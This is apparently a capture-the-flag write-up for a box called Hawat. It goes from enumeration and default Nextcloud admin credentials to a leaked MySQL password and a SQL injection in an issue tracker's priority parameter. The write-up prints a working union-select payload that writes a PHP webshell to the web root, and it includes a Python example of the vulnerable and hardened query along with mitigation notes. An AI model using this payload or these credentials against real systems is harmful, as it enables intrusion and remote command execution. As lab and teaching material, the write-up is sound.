
Hawat 🔹

Enumeration

Port 17445 shows a web page of an issue tracker

We can register users and log in

Port 30455 shows a web page with no links

Using feroxbuster we find a nextcloud instance

Trying admin/admin works

We find the issue tracker project in here

Downloading and exploring it, we find the MySQL password

issue_user:ManagementInsideOld797

We can see that the priority parameter is injectable in the checkByPriority function

So, going to the web page

GET is not allowed, so POST? Capture the request with Caido

Change GET to POST

Adding the priority parameter, we get a 200

We saw with feroxbuster that there is a phpinfo page, and it shows that the document root is /srv/http, so we can write a webshell there through the injection

' union select '<?php echo system($_REQUEST["bingo"]); ?>' into outfile '/srv/http/cmd.php' -- -
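The root cause is that checkByPriority concatenates the priority parameter into its SQL string. The following is an added example (not the writeup's or the issue tracker's own code) showing the vulnerable pattern beside a hardened version that allowlists the value and binds it as a parameter; it is written in Python with sqlite3 so it runs stand-alone, and the table, column names, sample rows and the set of allowed priorities are all assumptions.

```python
"""Added example: vulnerable vs. hardened checkByPriority lookup.

The real project is PHP on MySQL; this uses sqlite3 so it runs offline.
Table/column names, sample rows and ALLOWED_PRIORITIES are assumptions.
"""
import sqlite3

# Assumed allowlist: a priority is an enum, not free text.
ALLOWED_PRIORITIES = {"low", "medium", "high", "critical"}

# The payload from the writeup, kept only to show that the hardened lookup
# never lets it reach the database.
PAGE_PAYLOAD = (
    "' union select '<?php echo system($_REQUEST[\"bingo\"]); ?>' "
    "into outfile '/srv/http/cmd.php' -- -"
)


def vulnerable_check_by_priority(conn, priority):
    """Mirrors the bug: user input is concatenated straight into the SQL."""
    sql = f"SELECT id, title FROM issues WHERE priority = '{priority}'"
    return conn.execute(sql).fetchall()


def check_by_priority(conn, priority):
    """Hardened lookup: allowlist first, then a bound parameter."""
    # 1) Reject anything that is not one of the known priority values.
    if priority not in ALLOWED_PRIORITIES:
        raise ValueError(f"invalid priority: {priority!r}")
    # 2) The driver sends the value separately from the statement text,
    #    so a quote inside it can never change the query structure.
    return conn.execute(
        "SELECT id, title FROM issues WHERE priority = ?", (priority,)
    ).fetchall()


def probe(fn, conn, value):
    """Classify what a lookup does with `value`.

    Returns the rows on success, 'sql_error' if the value reached the SQL
    parser and broke the statement (the tell-tale sign of an injection
    point), or 'rejected' if validation stopped it before any query ran.
    """
    try:
        return fn(conn, value)
    except sqlite3.OperationalError:
        return "sql_error"
    except ValueError:
        return "rejected"


def build_demo_db():
    """Constructed in-memory issues table with a few sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE issues (id INTEGER PRIMARY KEY, title TEXT, priority TEXT)"
    )
    conn.executemany(
        "INSERT INTO issues (title, priority) VALUES (?, ?)",
        [
            ("Login page broken", "high"),
            ("Typo in footer", "low"),
            ("Default credentials still in use", "critical"),
        ],
    )
    conn.commit()
    return conn


if __name__ == "__main__":
    db = build_demo_db()
    print("hardened, valid   :", probe(check_by_priority, db, "high"))
    print("hardened, payload :", probe(check_by_priority, db, PAGE_PAYLOAD))
    print("vulnerable, quote :", probe(vulnerable_check_by_priority, db, "high'"))
```

A stray quote in the input is a cheap regression check: the vulnerable lookup turns it into a SQL error (the value reached the parser), while the hardened one rejects it before a query is built. The file write itself needs two further misconfigurations that are independent of the application code: the database account must hold the MySQL FILE privilege with `secure_file_priv` unset, and the document root must be writable by the database server process. Denying FILE to the application's DB user and keeping /srv/http read-only for it stops the `into outfile` step even if an injection remains.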

URL-encode the payload, for example with https://www.url-encode-decode.com/

Accessing the path

Post Exploitation

Get the flag